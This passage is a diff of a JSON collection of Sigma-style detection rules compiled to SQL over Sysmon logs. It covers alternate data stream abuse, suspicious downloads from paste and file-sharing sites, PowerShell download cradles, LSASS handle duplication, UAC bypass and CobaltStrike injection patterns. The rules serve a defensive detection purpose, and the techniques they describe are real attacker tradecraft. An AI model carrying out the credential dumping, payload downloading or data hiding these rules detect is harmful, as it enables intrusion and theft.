LIKE '%IMPHASH=22A22BC9E4E0D2F189F1EA01748816AC%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=7FA30E6BB7E8E8A69155636E50BF1B28%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_exploit_cve_2019_1378.yml" + "filename": "create_stream_hash_hacktool_download.yml" }, { - "title": "Regasm/Regsvcs Suspicious Execution", - "id": "cc368ed0-2411-45dc-a222-510ace303cb2", + "title": "Creation Of a Suspicious ADS File Outside a Browser Download", + "id": "573df571-a223-43bc-846e-3f98da481eca", "status": "experimental", - "description": "Detects 
suspicious execution of Regasm/Regsvcs utilities", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects the creation of a suspicious ADS (Alternate Data Stream) file by software other than browsers", + "author": "frack113", "tags": [ - "attack.defense_evasion", - "attack.t1218.009" + "attack.defense_evasion" ], "falsepositives": [ - "Unknown" + "Other legitimate browsers not currently included in the filter (please add them)", + "Legitimate downloads via scripting or command-line tools (Investigate to determine if it's legitimate)" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((((Image LIKE '%\\\\Regsvcs.exe' ESCAPE '\\' OR Image LIKE '%\\\\Regasm.exe' ESCAPE '\\') OR OriginalFileName IN ('RegSvcs.exe', 'RegAsm.exe')) AND (CommandLine LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Downloads\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\PerfLogs\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Windows\\\\Temp\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Microsoft\\\\Windows\\\\Start Menu\\\\Programs\\\\Startup\\\\%' ESCAPE '\\')) OR (((Image LIKE '%\\\\Regsvcs.exe' ESCAPE '\\' OR Image LIKE '%\\\\Regasm.exe' ESCAPE '\\') OR OriginalFileName IN ('RegSvcs.exe', 'RegAsm.exe')) AND NOT ((CommandLine LIKE '%.dll%' ESCAPE '\\') OR ((CommandLine LIKE '%\\\\Regasm.exe\"' ESCAPE '\\' OR CommandLine LIKE '%\\\\Regasm.exe' ESCAPE '\\' OR CommandLine LIKE '%\\\\Regsvcs.exe\"' ESCAPE '\\' OR CommandLine LIKE '%\\\\Regsvcs.exe' ESCAPE '\\'))))))" + "SELECT * FROM logs WHERE ((EventID = '15' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Contents LIKE '[ZoneTransfer] ZoneId=3%' ESCAPE '\\' AND TargetFilename LIKE '%:Zone.Identifier' ESCAPE '\\' AND (TargetFilename LIKE '%.exe%' ESCAPE '\\' OR 
TargetFilename LIKE '%.scr%' ESCAPE '\\' OR TargetFilename LIKE '%.bat%' ESCAPE '\\' OR TargetFilename LIKE '%.cmd%' ESCAPE '\\' OR TargetFilename LIKE '%.docx%' ESCAPE '\\' OR TargetFilename LIKE '%.hta%' ESCAPE '\\' OR TargetFilename LIKE '%.jse%' ESCAPE '\\' OR TargetFilename LIKE '%.lnk%' ESCAPE '\\' OR TargetFilename LIKE '%.pptx%' ESCAPE '\\' OR TargetFilename LIKE '%.ps%' ESCAPE '\\' OR TargetFilename LIKE '%.reg%' ESCAPE '\\' OR TargetFilename LIKE '%.sct%' ESCAPE '\\' OR TargetFilename LIKE '%.vb%' ESCAPE '\\' OR TargetFilename LIKE '%.wsc%' ESCAPE '\\' OR TargetFilename LIKE '%.wsf%' ESCAPE '\\' OR TargetFilename LIKE '%.xlsx%' ESCAPE '\\')) AND NOT ((Image LIKE '%\\\\brave.exe' ESCAPE '\\') OR ((Image LIKE 'C:\\\\Program Files\\\\Google\\\\Chrome\\\\Application\\\\chrome.exe' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files (x86)\\\\Google\\\\Chrome\\\\Application\\\\chrome.exe' ESCAPE '\\')) OR ((Image LIKE 'C:\\\\Program Files\\\\Mozilla Firefox\\\\firefox.exe' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files (x86)\\\\Mozilla Firefox\\\\firefox.exe' ESCAPE '\\')) OR ((Image LIKE 'C:\\\\Program Files (x86)\\\\Internet Explorer\\\\iexplore.exe' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files\\\\Internet Explorer\\\\iexplore.exe' ESCAPE '\\')) OR (Image LIKE '%\\\\maxthon.exe' ESCAPE '\\') OR (Image LIKE 'C:\\\\Program Files (x86)\\\\Microsoft\\\\EdgeWebView\\\\Application\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\WindowsApps\\\\MicrosoftEdge.exe' ESCAPE '\\' OR (Image LIKE 'C:\\\\Program Files (x86)\\\\Microsoft\\\\Edge\\\\Application\\\\msedge.exe' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files\\\\Microsoft\\\\Edge\\\\Application\\\\msedge.exe' ESCAPE '\\')) OR ((Image LIKE 'C:\\\\Program Files (x86)\\\\Microsoft\\\\EdgeCore\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files\\\\Microsoft\\\\EdgeCore\\\\%' ESCAPE '\\') AND (Image LIKE '%\\\\msedge.exe' ESCAPE '\\' OR Image LIKE '%\\\\msedgewebview2.exe' ESCAPE '\\')) OR (Image LIKE '%\\\\opera.exe' ESCAPE '\\') 
OR (Image LIKE '%\\\\safari.exe' ESCAPE '\\') OR (Image LIKE '%\\\\seamonkey.exe' ESCAPE '\\') OR (Image LIKE '%\\\\vivaldi.exe' ESCAPE '\\') OR (Image LIKE '%\\\\whale.exe' ESCAPE '\\')))" ], - "filename": "proc_creation_win_lolbin_regasm.yml" + "filename": "create_stream_hash_creation_internet_file.yml" }, { - "title": "Suspect Svchost Activity", - "id": "16c37b52-b141-42a5-a3ea-bbe098444397", + "title": "Potential Suspicious Winget Package Installation", + "id": "a3f5c081-e75b-43a0-9f5b-51f26fe5dba2", "status": "experimental", - "description": "It is extremely abnormal for svchost.exe to spawn without any CLI arguments and is normally observed when a malicious process spawns the process and injects code into the process memory space.", - "author": "David Burkett, @signalblur", + "description": "Detects potential suspicious winget package installation from a suspicious source.", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1055" + "attack.persistence" ], "falsepositives": [ - "Rpcnet.exe / rpcnetp.exe which is a lojack style software. 
https://www.blackhat.com/docs/us-14/materials/us-14-Kamlyuk-Kamluk-Computrace-Backdoor-Revisited.pdf" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (CommandLine LIKE '%svchost.exe' ESCAPE '\\' AND Image LIKE '%\\\\svchost.exe' ESCAPE '\\') AND NOT ((ParentImage LIKE '%\\\\rpcnet.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\rpcnetp.exe' ESCAPE '\\') OR CommandLine = ''))" + "SELECT * FROM logs WHERE (EventID = '15' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Contents LIKE '[ZoneTransfer] ZoneId=3%' ESCAPE '\\' AND (Contents LIKE '%://1%' ESCAPE '\\' OR Contents LIKE '%://2%' ESCAPE '\\' OR Contents LIKE '%://3%' ESCAPE '\\' OR Contents LIKE '%://4%' ESCAPE '\\' OR Contents LIKE '%://5%' ESCAPE '\\' OR Contents LIKE '%://6%' ESCAPE '\\' OR Contents LIKE '%://7%' ESCAPE '\\' OR Contents LIKE '%://8%' ESCAPE '\\' OR Contents LIKE '%://9%' ESCAPE '\\') AND TargetFilename LIKE '%:Zone.Identifier' ESCAPE '\\' AND TargetFilename LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\WinGet\\\\%' ESCAPE '\\')" ], - "filename": "proc_creation_win_svchost_execution_with_no_cli_flags.yml" + "filename": "create_stream_hash_winget_susp_package_source.yml" }, { - "title": "PUA - Nimgrab Execution", - "id": "74a12f18-505c-4114-8d0b-8448dd5485c6", + "title": "Suspicious File Download From File Sharing Websites", + "id": "52182dfb-afb7-41db-b4bc-5336cb29b464", "status": "experimental", - "description": "Detects the usage of nimgrab, a tool bundled with the Nim programming framework and used for downloading files.", - "author": "frack113", + "description": "Detects the download of suspicious file type from a well-known file and paste sharing domain", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.command_and_control", - "attack.t1105" + "attack.defense_evasion", + "attack.s0139", + "attack.t1564.004" ], "falsepositives": [ - "Legitimate use of Nim on a developer systems" + 
"Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\nimgrab.exe' ESCAPE '\\' OR (Hashes LIKE '%MD5=2DD44C3C29D667F5C0EF5F9D7C7FFB8B%' ESCAPE '\\' OR Hashes LIKE '%SHA256=F266609E91985F0FE3E31C5E8FAEEEC4FFA5E0322D8B6F15FE69F4C5165B9559%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=C07FDDD21D123EA9B3A08EEF44AAAC45%' ESCAPE '\\') OR md5 = '2DD44C3C29D667F5C0EF5F9D7C7FFB8B' OR sha256 = 'F266609E91985F0FE3E31C5E8FAEEEC4FFA5E0322D8B6F15FE69F4C5165B9559' OR Imphash = 'C07FDDD21D123EA9B3A08EEF44AAAC45'))" + "SELECT * FROM logs WHERE (EventID = '15' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (Contents LIKE '%https://transfer.sh/%' ESCAPE '\\' OR Contents LIKE '%raw.githubusercontent.com%' ESCAPE '\\' OR Contents LIKE '%gist.githubusercontent.com%' ESCAPE '\\' OR Contents LIKE '%pastebin.com%' ESCAPE '\\' OR Contents LIKE '%cdn.discordapp.com/attachments/%' ESCAPE '\\' OR Contents LIKE '%mediafire.com%' ESCAPE '\\' OR Contents LIKE '%mega.nz%' ESCAPE '\\' OR Contents LIKE '%ddns.net%' ESCAPE '\\' OR Contents LIKE '%.paste.ee%' ESCAPE '\\' OR Contents LIKE '%.hastebin.com%' ESCAPE '\\' OR Contents LIKE '%.ghostbin.co/%' ESCAPE '\\' OR Contents LIKE '%ufile.io%' ESCAPE '\\' OR Contents LIKE '%storage.googleapis.com%' ESCAPE '\\' OR Contents LIKE '%anonfiles.com%' ESCAPE '\\' OR Contents LIKE '%send.exploit.in%' ESCAPE '\\' OR Contents LIKE '%privatlab.net%' ESCAPE '\\' OR Contents LIKE '%privatlab.com%' ESCAPE '\\' OR Contents LIKE '%sendspace.com%' ESCAPE '\\' OR Contents LIKE '%pastetext.net%' ESCAPE '\\' OR Contents LIKE '%pastebin.pl%' ESCAPE '\\' OR Contents LIKE '%paste.ee%' ESCAPE '\\') AND (TargetFilename LIKE '%.exe:Zone%' ESCAPE '\\' OR TargetFilename LIKE '%.vbs:Zone%' ESCAPE '\\' OR TargetFilename LIKE '%.vbe:Zone%' ESCAPE '\\' OR TargetFilename LIKE '%.dll:Zone%' ESCAPE '\\' OR TargetFilename LIKE '%.one:Zone%' ESCAPE '\\' OR TargetFilename LIKE 
'%.hta:Zone%' ESCAPE '\\' OR TargetFilename LIKE '%.lnk:Zone%' ESCAPE '\\' OR TargetFilename LIKE '%.xll:Zone%' ESCAPE '\\' OR TargetFilename LIKE '%.cpl:Zone%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_pua_nimgrab.yml" + "filename": "create_stream_hash_file_sharing_domains_download_susp_extension.yml" }, { - "title": "PowerShell Web Download", - "id": "6e897651-f157-4d8f-aaeb-df8151488385", - "status": "experimental", - "description": "Detects suspicious ways to download files or content using PowerShell", - "author": "Florian Roth (Nextron Systems)", + "title": "Exports Registry Key To an Alternate Data Stream", + "id": "0d7a9363-af70-4e7b-a3b7-1a176b7fbe84", + "status": "test", + "description": "Exports the target Registry key and hides it in the specified alternate data stream.", + "author": "Oddvar Moe, Sander Wiebing, oscd.community", + "tags": [ + "attack.defense_evasion", + "attack.t1564.004" + ], "falsepositives": [ - "Scripts or tools that download files" + "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (CommandLine LIKE '%.DownloadString(%' ESCAPE '\\' OR CommandLine LIKE '%.DownloadFile(%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-WebRequest %' ESCAPE '\\' OR CommandLine LIKE '%iwr %' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '15' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\regedit.exe' ESCAPE '\\')" ], - "filename": "proc_creation_win_powershell_download_cradles.yml" + "filename": "create_stream_hash_regedit_export_to_ads.yml" }, { - "title": "DLL Execution via Rasautou.exe", - "id": "cd3d1298-eb3b-476c-ac67-12847de55813", - "status": "test", - "description": "Detects using Rasautou.exe for loading arbitrary .DLL specified in -d option and executes the export specified in -p.", - "author": "Julia Fomina, oscd.community", + "title": "Unusual File Download From File Sharing Websites", + 
"id": "ae02ed70-11aa-4a22-b397-c0d0e8f6ea99", + "status": "experimental", + "description": "Detects the download of suspicious file type from a well-known file and paste sharing domain", + "author": "Florian Roth (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1218" + "attack.s0139", + "attack.t1564.004" ], "falsepositives": [ - "Unlikely" + "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\rasautou.exe' ESCAPE '\\' OR OriginalFileName = 'rasdlui.exe') AND (CommandLine LIKE '% -d %' ESCAPE '\\' AND CommandLine LIKE '% -p %' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '15' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (Contents LIKE '%transfer.sh%' ESCAPE '\\' OR Contents LIKE '%raw.githubusercontent.com%' ESCAPE '\\' OR Contents LIKE '%gist.githubusercontent.com%' ESCAPE '\\' OR Contents LIKE '%pastebin.com%' ESCAPE '\\' OR Contents LIKE '%cdn.discordapp.com/attachments/%' ESCAPE '\\' OR Contents LIKE '%mediafire.com%' ESCAPE '\\' OR Contents LIKE '%mega.nz%' ESCAPE '\\' OR Contents LIKE '%ddns.net%' ESCAPE '\\' OR Contents LIKE '%.paste.ee%' ESCAPE '\\' OR Contents LIKE '%.hastebin.com%' ESCAPE '\\' OR Contents LIKE '%.ghostbin.co/%' ESCAPE '\\' OR Contents LIKE '%ufile.io%' ESCAPE '\\' OR Contents LIKE '%storage.googleapis.com%' ESCAPE '\\' OR Contents LIKE '%anonfiles.com%' ESCAPE '\\' OR Contents LIKE '%send.exploit.in%' ESCAPE '\\' OR Contents LIKE '%privatlab.net%' ESCAPE '\\' OR Contents LIKE '%privatlab.com%' ESCAPE '\\' OR Contents LIKE '%sendspace.com%' ESCAPE '\\' OR Contents LIKE '%pastetext.net%' ESCAPE '\\' OR Contents LIKE '%pastebin.pl%' ESCAPE '\\' OR Contents LIKE '%paste.ee%' ESCAPE '\\') AND (TargetFilename LIKE '%.ps1:Zone%' ESCAPE '\\' OR TargetFilename LIKE '%.bat:Zone%' ESCAPE '\\' OR TargetFilename LIKE '%.cmd:Zone%' ESCAPE '\\'))" ], - "filename": 
"proc_creation_win_lolbin_rasautou_dll_execution.yml" + "filename": "create_stream_hash_file_sharing_domains_download_unusual_extension.yml" }, { - "title": "Renamed MegaSync Execution", - "id": "643bdcac-8b82-49f4-9fd9-25a90b929f3b", - "status": "test", - "description": "Detects the execution of a renamed MegaSync.exe as seen used by ransomware families like Nefilim, Sodinokibi, Pysa, and Conti.", - "author": "Sittikorn S", + "title": "Unusual File Download from Direct IP Address", + "id": "025bd229-fd1f-4fdb-97ab-20006e1a5368", + "status": "experimental", + "description": "Detects the download of suspicious file type from URLs with IP", + "author": "Nasreddine Bencherchali (Nextron Systems), Florian Roth (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1218" + "attack.t1564.004" ], "falsepositives": [ - "Software that illegally integrates MegaSync in a renamed form", - "Administrators that have renamed MegaSync" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND OriginalFileName = 'megasync.exe' AND NOT (Image LIKE '%\\\\megasync.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '15' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Contents REGEXP 'http[s]?://[0-9]{1,3}\\.[0-9]{1,3}\\.[0-9]{1,3}\\.[0-9]{1,3}' AND (TargetFilename LIKE '%.ps1:Zone%' ESCAPE '\\' OR TargetFilename LIKE '%.bat:Zone%' ESCAPE '\\' OR TargetFilename LIKE '%.exe:Zone%' ESCAPE '\\' OR TargetFilename LIKE '%.vbe:Zone%' ESCAPE '\\' OR TargetFilename LIKE '%.vbs:Zone%' ESCAPE '\\' OR TargetFilename LIKE '%.dll:Zone%' ESCAPE '\\' OR TargetFilename LIKE '%.one:Zone%' ESCAPE '\\' OR TargetFilename LIKE '%.cmd:Zone%' ESCAPE '\\' OR TargetFilename LIKE '%.hta:Zone%' ESCAPE '\\' OR TargetFilename LIKE '%.xll:Zone%' ESCAPE '\\' OR TargetFilename LIKE '%.lnk:Zone%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_renamed_megasync.yml" + "filename": 
"create_stream_hash_susp_ip_domains.yml" }, { - "title": "Application Whitelisting Bypass via Bginfo", - "id": "aaf46cdc-934e-4284-b329-34aa701e3771", + "title": "Hidden Executable In NTFS Alternate Data Stream", + "id": "b69888d4-380c-45ce-9cf9-d9ce46e67821", "status": "test", - "description": "Execute VBscript code that is referenced within the *.bgi file.", - "author": "Beyu Denis, oscd.community", + "description": "Detects the creation of an ADS (Alternate Data Stream) that contains an executable (non-empty imphash)", + "author": "Florian Roth (Nextron Systems), @0xrawsec", "tags": [ - "attack.execution", - "attack.t1059.005", "attack.defense_evasion", - "attack.t1218", - "attack.t1202" + "attack.s0139", + "attack.t1564.004" ], "falsepositives": [ "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\bginfo.exe' ESCAPE '\\' AND CommandLine LIKE '%/popup%' ESCAPE '\\' AND CommandLine LIKE '%/nolicprompt%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '15' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND Hash LIKE '%IMPHASH=%' ESCAPE '\\' AND NOT (Hash LIKE '%IMPHASH=00000000000000000000000000000000%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_lolbin_bginfo.yml" + "filename": "create_stream_hash_ads_executable.yml" }, { - "title": "Suspicious Extrac32 Alternate Data Stream Execution", - "id": "4b13db67-0c45-40f1-aba8-66a1a7198a1e", - "status": "test", - "description": "Extract data from cab file and hide it in an alternate data stream", - "author": "frack113", + "title": "HandleKatz Duplicating LSASS Handle", + "id": "b1bd3a59-c1fd-4860-9f40-4dd161a7d1f5", + "status": "experimental", + "description": "Detects HandleKatz opening LSASS to duplicate its handle to later dump the memory without opening any new handles", + "author": "Bhabesh Raj (rule), @thefLinkk", "tags": [ + "attack.execution", + "attack.t1106", "attack.defense_evasion", 
- "attack.t1564.004" + "attack.t1003.001" ], "falsepositives": [ "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%extrac32.exe%' ESCAPE '\\' AND CommandLine LIKE '%.cab%' ESCAPE '\\' AND CommandLine REGEXP ':[^\\\\]')" + "SELECT * FROM logs WHERE (EventID = '10' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetImage LIKE '%\\\\lsass.exe' ESCAPE '\\' AND GrantedAccess = '0x1440' AND CallTrace LIKE 'C:\\\\Windows\\\\System32\\\\ntdll.dll+%' ESCAPE '\\' AND CallTrace LIKE '%|UNKNOWN(%' ESCAPE '\\' AND CallTrace LIKE '%)' ESCAPE '\\')" ], - "filename": "proc_creation_win_lolbin_extrac32_ads.yml" + "filename": "proc_access_win_handlekatz_lsass_access.yml" }, { - "title": "Turla Group Lateral Movement", - "id": "c601f20d-570a-4cde-a7d6-e17f99cb8e7f", - "status": "test", - "description": "Detects automated lateral movement by Turla group", - "author": "Markus Neis", + "title": "Direct Syscall of NtOpenProcess", + "id": "3f3f3506-1895-401b-9cc3-e86b16e630d0", + "status": "experimental", + "description": "Detects the usage of the direct syscall of NtOpenProcess which might be done from a CobaltStrike BOF.", + "author": "Christian Burkard (Nextron Systems), Tim Shelton", "tags": [ - "attack.g0010", "attack.execution", - "attack.t1059", - "attack.lateral_movement", - "attack.t1021.002", - "attack.discovery", - "attack.t1083", - "attack.t1135" + "attack.t1106" ], "falsepositives": [ "Unknown" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (CommandLine LIKE 'net use \\\\\\\\\\%DomainController\\%\\\\C$ \"P@ssw0rd\" %' ESCAPE '\\' OR CommandLine LIKE 'dir c:\\\\%.doc% /s' ESCAPE '\\' OR CommandLine LIKE 'dir \\%TEMP\\%\\\\%.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '10' AND Channel = 
'Microsoft-Windows-Sysmon/Operational') AND CallTrace LIKE 'UNKNOWN%' ESCAPE '\\' AND NOT ((TargetImage LIKE 'C:\\\\Program Files\\\\Cylance\\\\Desktop\\\\CylanceUI.exe' ESCAPE '\\' AND SourceImage LIKE 'C:\\\\Windows\\\\Explorer.EXE' ESCAPE '\\') OR (TargetImage LIKE 'C:\\\\Program Files (x86)\\\\Microsoft\\\\EdgeUpdate\\\\MicrosoftEdgeUpdate.exe' ESCAPE '\\' AND SourceImage LIKE 'C:\\\\Program Files (x86)\\\\Microsoft\\\\Temp\\\\%' ESCAPE '\\' AND SourceImage LIKE '%\\\\MicrosoftEdgeUpdate.exe' ESCAPE '\\') OR (TargetImage LIKE '%vcredist\\_x64.exe' ESCAPE '\\' AND SourceImage LIKE '%vcredist\\_x64.exe' ESCAPE '\\') OR (TargetImage LIKE 'C:\\\\Windows\\\\system32\\\\systeminfo.exe' ESCAPE '\\' AND SourceImage LIKE '%setup64.exe' ESCAPE '\\') OR (TargetImage LIKE '%AmazonSSMAgentSetup.exe' ESCAPE '\\' AND SourceImage LIKE '%AmazonSSMAgentSetup.exe' ESCAPE '\\') OR (TargetImage LIKE '%C:\\\\Program Files\\\\Mozilla Firefox\\\\firefox.exe' ESCAPE '\\' AND SourceImage LIKE '%C:\\\\Program Files\\\\Mozilla Firefox\\\\firefox.exe' ESCAPE '\\') OR (TargetImage LIKE '%\\\\AppData\\\\Local\\\\Programs\\\\Microsoft VS Code\\\\Code.exe' ESCAPE '\\' AND SourceImage LIKE '%\\\\AppData\\\\Local\\\\Programs\\\\Microsoft VS Code\\\\Code.exe' ESCAPE '\\') OR (TargetImage LIKE '%C:\\\\Program Files\\\\Google\\\\Chrome\\\\Application\\\\chrome.exe' ESCAPE '\\' AND SourceImage LIKE '%C:\\\\Program Files\\\\Google\\\\Chrome\\\\Application\\\\chrome.exe' ESCAPE '\\') OR (TargetImage LIKE '%C:\\\\Program Files (x86)\\\\Google\\\\Update\\\\GoogleUpdate.exe' ESCAPE '\\' AND SourceImage LIKE '%C:\\\\Program Files (x86)\\\\Google\\\\Update\\\\GoogleUpdate.exe' ESCAPE '\\') OR (TargetImage LIKE '%\\\\AppData\\\\Local\\\\Microsoft\\\\Teams\\\\current\\\\Teams.exe' ESCAPE '\\' AND SourceImage LIKE '%\\\\AppData\\\\Local\\\\Microsoft\\\\Teams\\\\current\\\\Teams.exe' ESCAPE '\\') OR (TargetImage LIKE 'C:\\\\Windows\\\\System32\\\\backgroundTaskHost.exe' ESCAPE '\\' AND SourceImage LIKE 
'C:\\\\Windows\\\\System32\\\\backgroundTaskHost.exe' ESCAPE '\\') OR (TargetImage LIKE 'C:\\\\Program Files (x86)\\\\CCleaner Browser\\\\Application\\\\CCleanerBrowser.exe' ESCAPE '\\' AND SourceImage LIKE 'C:\\\\Program Files (x86)\\\\CCleaner Browser\\\\Application\\\\CCleanerBrowser.exe' ESCAPE '\\') OR (TargetImage LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND TargetImage LIKE '%\\\\AppData\\\\Local\\\\Discord\\\\%' ESCAPE '\\' AND TargetImage LIKE '%\\\\Discord.exe' ESCAPE '\\') OR (TargetImage LIKE 'C:\\\\WINDOWS\\\\system32\\\\AUDIODG.EXE' ESCAPE '\\') OR (SourceImage LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND SourceImage LIKE '%\\\\AppData\\\\Local\\\\yammerdesktop\\\\app-%' ESCAPE '\\' AND SourceImage LIKE '%\\\\Yammer.exe' ESCAPE '\\' AND TargetImage LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND TargetImage LIKE '%\\\\AppData\\\\Local\\\\yammerdesktop\\\\app-%' ESCAPE '\\' AND TargetImage LIKE '%\\\\Yammer.exe' ESCAPE '\\' AND GrantedAccess = '0x1000') OR (Provider_Name = 'Microsoft-Windows-Kernel-Audit-API-Calls') OR (TargetImage LIKE '%\\\\Evernote\\\\Evernote.exe' ESCAPE '\\')))" ], - "filename": "proc_creation_win_apt_turla_commands_critical.yml" + "filename": "proc_access_win_direct_syscall_ntopenprocess.yml" }, { - "title": "Allow Service Access Using Security Descriptor Tampering Via Sc.EXE", - "id": "6c8fbee5-dee8-49bc-851d-c3142d02aa47", - "status": "experimental", - "description": "Detects suspicious DACL modifications to allow access to a service from a suspicious trustee. 
This can be used to override access restrictions set by previous ACLs.", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "UAC Bypass Using WOW64 Logger DLL Hijack", + "id": "4f6c43e2-f989-4ea5-bcd8-843b49a0317c", + "status": "test", + "description": "Detects the pattern of UAC Bypass using a WoW64 logger DLL hijack (UACMe 30)", + "author": "Christian Burkard (Nextron Systems)", "tags": [ - "attack.persistence", - "attack.t1543.003" + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1548.002" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\sc.exe' ESCAPE '\\' OR OriginalFileName = 'sc.exe') AND (CommandLine LIKE '%sdset%' ESCAPE '\\' AND CommandLine LIKE '%A;%' ESCAPE '\\') AND (CommandLine LIKE '%;IU%' ESCAPE '\\' OR CommandLine LIKE '%;SU%' ESCAPE '\\' OR CommandLine LIKE '%;BA%' ESCAPE '\\' OR CommandLine LIKE '%;SY%' ESCAPE '\\' OR CommandLine LIKE '%;WD%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '10' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND SourceImage LIKE '%:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\' AND GrantedAccess = '0x1fffff' AND CallTrace LIKE 'UNKNOWN(0000000000000000)|UNKNOWN(0000000000000000)|%' ESCAPE '\\')" ], - "filename": "proc_creation_win_sc_sdset_allow_service_changes.yml" + "filename": "proc_access_win_uac_bypass_wow64_logger.yml" }, { - "title": "Suspicious Remote Child Process From Outlook", - "id": "e212d415-0e93-435f-9e1a-f29005bb4723", + "title": "CobaltStrike BOF Injection Pattern", + "id": "09706624-b7f6-455d-9d02-adee024cee1d", "status": "test", - "description": "Detects a suspicious child process spawning from Outlook where the image is located in a remote location (SMB/WebDav shares).", - "author": "Markus Neis, Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects a typical pattern of a CobaltStrike BOF which inject 
into other processes", + "author": "Christian Burkard (Nextron Systems)", "tags": [ "attack.execution", - "attack.t1059", - "attack.t1202" + "attack.t1106", + "attack.defense_evasion", + "attack.t1562.001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND ParentImage LIKE '%\\\\outlook.exe' ESCAPE '\\' AND Image LIKE '\\\\\\\\\\*' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '10' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CallTrace REGEXP '^C:\\\\Windows\\\\SYSTEM32\\\\ntdll\\.dll\\+[a-z0-9]{4,6}\\|C:\\\\Windows\\\\System32\\\\KERNELBASE\\.dll\\+[a-z0-9]{4,6}\\|UNKNOWN\\([A-Z0-9]{16}\\)$' AND GrantedAccess IN ('0x1028', '0x1fffff'))" ], - "filename": "proc_creation_win_office_outlook_susp_child_processes_remote.yml" + "filename": "proc_access_win_cobaltstrike_bof_injection_pattern.yml" }, { - "title": "Stop Windows Service Via Net.EXE", - "id": "88872991-7445-4a22-90b2-a3adadb0e827", - "status": "experimental", - "description": "Detects the stopping of a Windows service", - "author": "Jakob Weinzettl, oscd.community, Nasreddine Bencherchali (Nextron Systems)", + "title": "Load Undocumented Autoelevated COM Interface", + "id": "fb3722e4-1a06-46b6-b772-253e2e7db933", + "status": "test", + "description": "COM interface (EditionUpgradeManager) that is not used by standard executables.", + "author": "oscd.community, Dmitry Uchakin", "tags": [ - "attack.impact", - "attack.t1489" + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1548.002" ], "falsepositives": 